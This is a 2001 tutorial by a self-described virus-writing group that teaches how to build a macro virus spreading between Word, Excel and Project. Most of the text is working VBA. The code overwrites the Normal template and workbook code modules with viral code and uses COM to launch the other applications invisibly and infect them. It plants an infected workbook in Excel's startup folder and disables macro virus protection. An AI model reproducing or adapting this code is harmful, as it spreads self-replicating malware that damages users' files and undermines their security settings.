-=Single Event Cross Infection and you=-
-=Mummy Mummy theres vikings on the tundra again=-

wtf and more to the point why?

Normal procedure for the development of an office macro virus uses multiple
macros each of which infects and then crosses using com to another application


+word macro         +
+excel crossing code+
+excel macro        +
+word crossing code +

An event sinked or single event crosser uses one single macro containing
code to spread to all target applications under a single piece of macro
code and containts the com code required to spread under all applications
this allows serious code re-use (eg same infection routine for all apps)


+event                   +
+application detection   +
+variable setup          +
+infection routines      +
+cross infection routines+


ok I probably should mention ... there is one major issue in this kind of replication
fortunately it is easily overcome with a little bit of good old brute force
Your probably thinking "ok , all well and good but not all apps support the same methods etc"
and you would be totally correct in that ... so in all the com crossing code we find which 
methods arent supported and comment them out until the code is actually onto the relevant app.
end of problem :P
theres probably a more elegant way to do this but hey ... untill you find it its '`s all the way ;)


Well as i already mentioned ... these things can be made small ... that's a big help ,
less code less to go wrong huh ;)
The code can also be seen as modular , once the main routines have been written infection
routines for other vba applications can be added and an entry made into the application
detection routine ... no problem :)

Okae then .. this sounds dumb ... show me code!
heres how a very simple event sinker works

ok , we replace this bit on crossing so every version of the virus has the correct trigger
simple as that :P

application detection...
Most vba implementations provide a function called application
returning the name of the app your running under , you can also pull application.version
if you are running any version specific code .. so the first step is to find out wtf we are running 

currentapp = Application 'k ... get app
currentver = application.version ' get version

Just in case anyone wants to look at visio ... just test for the first few letters of application 
not being "Microsoft" and you will be fine :)

If currentapp = "Microsoft Word" Then GoTo setupword
If currentapp = "Microsoft Excel" Then GoTo setupexcel

so now we know exactly what we are running in and have a variable containing the version number

now we setup the variables that are specific for the current application

Set current = ActiveDocument.VBProject.VBComponents.Item(1).codemodule
Set other = NormalTemplate.VBProject.VBComponents.Item(1).codemodule
goto infection
Set other = ActiveWorkbook.VBProject.VBComponents("ThisWorkBook").codemodule
Set current = ThisWorkBook.VBProject.VBComponents("ThisWorkBook").codemodule

now we try and compartmentalise the infection routine , to try and drop code size slightly
due to word having the normaltemplate <-> activedocument infection method it needs two
routines however excel needs only one , so it makes sense to be able to use one of the
infection routines that the vir uses for word to infect excel also.

If other.lines(2, 1) <> "'" Then
other.deletelines 1, other.countoflines
other.insertlines 1, current.countoflines(1, current.countoflines)
if currentapp = "Microsoft Excel" then
ActiveWorkbook.SaveAs (ActiveWorkbook.FullName)
goto nextexcelbit
end if
End If

this takes care of normal template infection under word but also handles the excel infection.
the excel infector would then jump over the activedocument infection code for word.
you could also reset the word document variables the other way round and just jump back
checking if this is the second run and jumping out of the loop if it is ... just a thought :P

If current.lines(2, 1) <> "'" Then
current.deletelines 1, current.countoflines
current.insertlines 1, other.lines(1, other.countoflines)
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If

ok , well now we have word and excel infected , documents have been saved and everything should
be fine.

you could also use the space before the activedocument infection to disable macro protection
however im a fan of just dropping a swiss-army reg file that disables everything.
Either way works but seeing as tho excel only has that method open to it it saves time and space.
The benefit of this is if you run such code in another app then switch to one of the more restrictive
applications (office 2k , office xp) you can have already disabled most if not all of the security
that is set as default on install.

after this comes the com stuff ... ok basically from an application that supports com you can
start and interact with any other application that supports it and interact with that application
as tho it was its own.
Neat thing being that many of these apps can be started invisibly , played with and then closed :)
So your word vir loads , activates and starts excel - infects it and then closes it down
excel goes the other way round... as long as you know the methods its no real problem

excel will have by this point jumped to "nextexcelbit" so word will run this code next

Set xlapp = CreateObject("Excel.Application") 'create a new instance of excel
'we sure as hell arent gonna set this instance as visible :P
chk = Dir(xlapp.Application.StartupPath & "\Book1.xls") 'check to see if our viral workbook is already there
If chk = "" Then 
Set book1Obj = xlapp.workbooks.Add 'add a workbook 
book1Obj.VBProject.VBComponents.Item(1).codemodule.insertlines 1, current.lines(1, current.countoflines) 'infect
book1Obj.VBProject.VBComponents.Item(1).codemodule.replaceline 1, "Private Sub Workbook_Deactivate()" 'change trigger
book1Obj.SaveAs (xlapp.Application.StartupPath & "\Book1.xls") 'save in startup dir
book1Obj.Close 'close book
End If
xlapp.Quit 'if already infected the code comes here first and quits the object
goto noinfword
Excel running this code will jump here :P

On Error GoTo noinfword
Set wordapp = CreateObject("Word.Application") 'create word object
Set wordobj = wordapp.NormalTemplate.VBProject.VBComponents.Item(1).codemodule 'set the wordobj to the normal template
If wordobj.lines(2, 1) <> "'" Then 'normal infection stuff
wordobj.deletelines 1, wordobj.countoflines
wordobj.insertlines 1, current.lines(1, current.countoflines)
wordobj.replaceline 1, "Private Sub Document_Close()"
end if
wordobj.quit 'close the object

ok , so we have word and excel now , both peices of code have the correct triggers and the com object for
the other has been shut down ... now all their is to do is drop the registry modifications to disable
macro virus protection and lower security levels (and set the vbom keys under xp if you wanna) and
thats it.
Sure you can work those out for yourself....

where now then?

well as i said ... modular!! its the key
a careful bit of programming can result in this kind of vir being modified to run under 4 apps with 
very little problem.

example code snippets

Macro virus protection disabling code for word (p here contains a marker to 
signify its word and e contains application.version)
If p = 1 And e <> "10.0" Then
CommandBars("Tools").Controls("Macro").Enabled = False 'comment out under excel
Options.VirusProtection = (Rnd * 0) 'comment out under excel
End If
(from Xp-Base ... aka papercut)

Application detection (here t contains the current application)
te$ = t: tested = Left(te$, 5)
If tested <> "Micro" Then GoTo itsvisio
If t = "Microsoft Word" Then GoTo notproject
If t = "Microsoft Excel" Then GoTo notwordeither
If t = "Microsoft Project" Then
(from Xp-Fallen)

crossing to another app without the same methods (eg any other app to project
apps going the other way replace these lines with ' as they go over)
proj1obj.replaceline 1, "Private Sub Project_Open(byval pj as Project)"
proj1obj.replaceline 25, "projects(x).Activate"
proj1obj.replaceline 26, "FileSaveAs Projects(x).FullName"
(from Xp-Fallen)


thats it....end of tute , carry on for irrelevant info
and apologies for typos n stuff ... bound to happen :D

music listend to whilst coding/writing this stuff
Godspeed you black emperor - f# a# infinity , slow riot for new zero kanada
death cab for cutie - something about airplanes , we have the facts
Orbital - halcyon & on & on

in these times, when everything is denied us
anything is possible
but everyday stubborn clumsy beautiful ideas rot on the withering vine
all dreams fall down
failure leads to irony,
and irony smothers us with all the pastel colours of the newest retail superstores
we call for an end to this state of affairs
long live a little bit of autonomy

dedicated to the most important person in my life...

Antistate - Metaphase Virus Team

Wednesday, August 15, 2001

Back to index